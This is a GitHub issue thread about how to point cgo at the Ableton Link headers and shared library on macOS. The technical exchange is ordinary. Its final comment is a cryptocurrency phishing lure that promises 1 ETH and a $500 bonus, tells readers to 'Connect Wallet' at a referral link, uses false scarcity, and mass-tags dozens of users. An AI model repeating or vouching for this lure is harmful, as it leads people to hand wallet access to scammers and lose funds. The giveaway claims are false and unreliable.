### ISSUE TITLE
cgo environment configuration

### ISSUE THREAD

**Issue by robmorgan** [antoi-ne/al#1]
Hey @antoi-ne,

Thanks for providing this. Just out of interest where are you placing the Ableton Link library headers on your system? Which environment variables and args are you passing to `cgo`? 

Thanks!

**Comment by antoi-ne** [comment]
Hey @robmorgan,

I installed `abl_link.h` in `/usr/local/include` and installed the built library (as shared, I could not make it work as a static lib) in `usr/local/lib/libabl_link.dylib`. I only tried on macOS.
I use the library in other projects without providing any specific flags or env, a simple `go run/build` worked for me.

FYI, I am working on implementing a pure Go version of Ableton Link to make the distribution of projects that use it easier (no external dependencies), I can ping you when its public if you wish :)

**Comment by robmorgan** [comment]
Hi Antoine,

Thanks for your response. I’ll give your advice a shot and let you know.
Also a pure Go implementation is exciting. Truth be told, I’ve stopped and
started several times and never gotten anywhere.

Cheers,

Rob

**Comment by antoi-ne** [comment]
Reopening so you can update on if it works!

**Comment by anishmansuri** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
fonsnp, @satyaborg, @Pub1ius, @chamies, @kangchuh, @schoolmeister, @zrdxs, @hfcrwx, @swanouyang, @awesome-doge, @wingpuiLaw, @liazheyua, @FOININVESTOR, @rax87, @Tristanimve, @Qasak, @neoremind, @fming09, @eminentgu, @uouotang, @lydqc, @BaCoNL, @gitaccount798, @GWJustin, @sheride, @lyhsir, @yuyaxiong, @kenniz, @keonjeo, @bfeole, @CTKnight, @striderw, @filipeakafilipe, @iower, @AntSan813, @begetan, @mateusandrade98, @vladyslavstartsev, @jiakun9707, @sadrasabouri, @yuzihan30, @k4is3r, @ShadowCatSteph, @yan-lixin, @patmar28, @KitsanaTanchai, @shove70, @moritzrinow, @s0ldev, @DanielTheFirstmaoyq, @TomasRoj, @Carterbluth, @RiverPhillips, @alexisjcarr, @democloudx, @GuilhermeAlbert, @RainFallsSilent, @TiA60, @mtwalves, @NotASithLord, @ZeroKill1024, @sansna, @HarvestStars, @valtera99, @imbsxav, @tim5go, @BlockHackTk, @kenniz, @bfortuner, @WadeZhu, @diogorsergio, @KeTao, @arigatodl, @Banou26, @EthanHeilman, @PulpCattel, @Rosie9999, @alexandresanlim, @ameijer-corsha, @ptruser, @1990jtf, @sj3014, @beaniejoy, @veeraprathab, @NikeGOGO, @rob1-alt, @adhocore, @e-muf, @fabiotkt, @wepeng, @gungorhafize, @henriiquecampos, @MozartWang, @mj8star, @leoyoung07, @grubstarstar, @jonathan7peter, @Birhane-G, @Accretence
